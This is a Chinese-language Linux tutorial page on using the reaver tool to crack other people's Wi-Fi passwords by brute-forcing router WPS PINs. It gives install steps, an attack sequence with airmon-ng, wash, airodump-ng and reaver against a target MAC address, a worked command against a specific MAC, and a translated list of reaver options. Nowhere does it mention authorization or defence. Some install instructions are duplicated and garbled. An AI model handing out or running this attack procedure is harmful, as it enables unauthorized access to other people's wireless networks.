歡迎來到Linux教程網
Linux教程網
Linux教程網
Linux教程網
Linux教程網 >> Linux基礎 >> 關於Linux >> 在linux下使用reaver破解無線wifi密碼的下載安裝使用方法

在linux下使用reaver破解無線wifi密碼的下載安裝使用方法

日期:2017/3/2 9:44:49   编辑:關於Linux
這篇文章主要為大家介紹了在linux下使用reaver破解無線wifi密碼的步驟,需要的朋友可以參考下

需要工具:reaver

原理:窮舉PIN碼以攻破無線路由器的安全防護

安裝:

下載源碼

解壓

tar-xzvf reaver-1.4.tar.gz

安裝必要的軟件依賴庫和工具

在您編譯reaver前需要先安裝pcaplib等工具,後面還需要aircrack-ng

sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev

編譯和安裝

配置和編譯Reaver

cd reaver-1.4

cd src

./configure

make

下載aircrack-ng源代碼並編譯

從Ubuntu12.04版本開始aircrack-ng不再被包含在版本軟件倉庫中,不過我們可以從網上下載它的源代碼進行編譯安裝。如果aircrack-ng已經存在,則不必安裝。./configure

make

sudo install

解壓 tar -xzvf reaver-1.4.tar.gz

安裝必要的軟件依賴庫和工具

在您編譯 reaver前需要先安裝 pcaplib等工具,後面還需要 aircrack-ng sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev

編譯和安裝

配置和編譯 Reaver

cd reaver-1.4 cd src ./configure make

安裝 Reaver

sudo make install

方法:

1 輸入:airmon-ng start wlan0 開啟監聽模式 (屏幕顯示 加載8187L驅動成功–一次就加載成功啊!)

2 輸入:wash -i mon0 -C 查看所有開啟WPS的無線路由 長時間無反應按Ctrl+C,結束進程,這時記下你要PJ的目標路由MAC.

3 輸入:airodump-ng mon0 網卡以混雜模式掃描所有頻道—並顯示所有AP的信息(包括 AP的信號強度,ESSID,MAC,頻道,加密方式,等等…..),按Ctrl+C,結束掃描.

注:如果你已知對方無線路由信息 第2,第3步 可省略!

4 輸入:reaver -i mon0 -b MAC -a -S -vv 開始窮舉pin碼

注:隨時可以按CTRL+C退出保存進程,下次按下光標控制鍵“上”鍵然後回車,進程可繼續。

實戰我輸入了reaver -i mon0 -b MACD8:5D:4C:37:78:F6 -a -S -vv -d 0 ( 多加了 -d 0 加快速度 ),只見屏幕飛閃……爽啊!

reaver 參數詳解

必須參數

-i, –interface=<wlan> Name of the monitor-mode interface to use

網卡的監視接口,通常是mon0

-b, –bssid=<mac> BSSID of the target AP

AP的MAC地址

Optional Arguments: 可選參數

-m, –mac=<mac> MAC of the host system

指定本機MAC地址

-e, –essid=<ssid> ESSID of the target AP

路由器的ESSID,一般不用指定

-c, –channel=<channel> Set the 802.11 channel for the interface (implies -f)

信號的頻道,如果不指定會自動掃描

-o, –out-file=<file> Send output to a log file [stdout]

輸出日志文件

-s, –session=<file> Restore a previous session file

恢復進度文件

-C, –exec=<command> Execute the supplied command upon successful pin recovery

pin成功後執行命令

-D, –daemonize Daemonize reaver

設置reaver成Daemon

-a, –auto Auto detect the best advanced options for the target AP

對目標AP自動檢測高級參數

-f, –fixed Disable channel hopping

禁止頻道跳轉

-5, –5ghz Use 5GHz 802.11 channels

使用5G頻道

-v, –verbose Display non-critical warnings (-vv for more)

顯示不重要警告信息 -vv 可以顯示更多

-q, –quiet Only display critical messages

只顯示關鍵信息

-h, –help Show help

顯示幫助

Advanced Options:高級選項

-p, –pin=<wps pin> Use the specified 4 or 8 digit WPS pin

使用指定的4位或者8位pin碼

-d, –delay=<seconds> Set the delay between pin attempts [1]

pin間延時,默認1秒

-l, –lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]

AP鎖定WPS後等待時間

-g, –max-attempts=<num> Quit after num pin attempts

最大pin次數

Reaver 參數

—天天

-x, –fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]

10次意外失敗後等待時間,默認0秒

-r, –recurring-delay=<x:y> Sleep for y seconds every x pin attempts

每x次pin後等待y秒

-t, –timeout=<seconds> Set the receive timeout period [5]

收包超時,默認5秒

-T, –m57-timeout=<seconds> Set the M5/M7 timeout period [0.20]

M5/M7超時,默認0.2秒

-A, –no-associate Do not associate with the AP (association must be done by another application)

不連入AP(連入過程必須有其他程序完成)

-N, –no-nacks Do not send NACK messages when out of order packets are received

不發送NACK信息(如果一直pin不動,可以嘗試這個參數)

-S, –dh-small Use small DH keys to improve crack speed

使用小DH關鍵值提高速度(推薦使用)

-L, –ignore-locks Ignore locked state reported by the target AP

忽略目標AP報告的鎖定狀態

-E, –eap-terminate Terminate each WPS session with an EAP FAIL packet

每當收到EAP失敗包就終止WPS進程

-n, –nack Target AP always sends a NACK [Auto]

對目標AP總是發送NACK,默認自動

-w, –win7 Mimic a Windows 7 registrar [False]

模擬win7注冊,默認關閉

Ps:影響到無線的因素很多,所以各參數之間的配合很重要,當然,最關鍵的還是取決於信號。

原理詳細:

什麼是PIN碼?

印在無線路由器設備標簽上的一組8位數字字符串,無線路由器管理界面中當然也會存在並可更改。

PIN碼有什麼用?

在無線網卡的配套管理軟件(如TP-LINK的QSS軟件)裡輸入無線路由器設備上的那8位數字字符串就可以成功登錄該已被加密的無線路由器。

窮舉PIN碼是什麼意思?

既然知道了無線路由器PIN值的范圍(8位純數字),且目前大部分設備的WPS是呈開啟狀態的,那麼窮舉PIN碼以攻破無線路由器的安全防護這一暴力行為就有了*理論*可行性

Copyright © Linux教程網 All Rights Reserved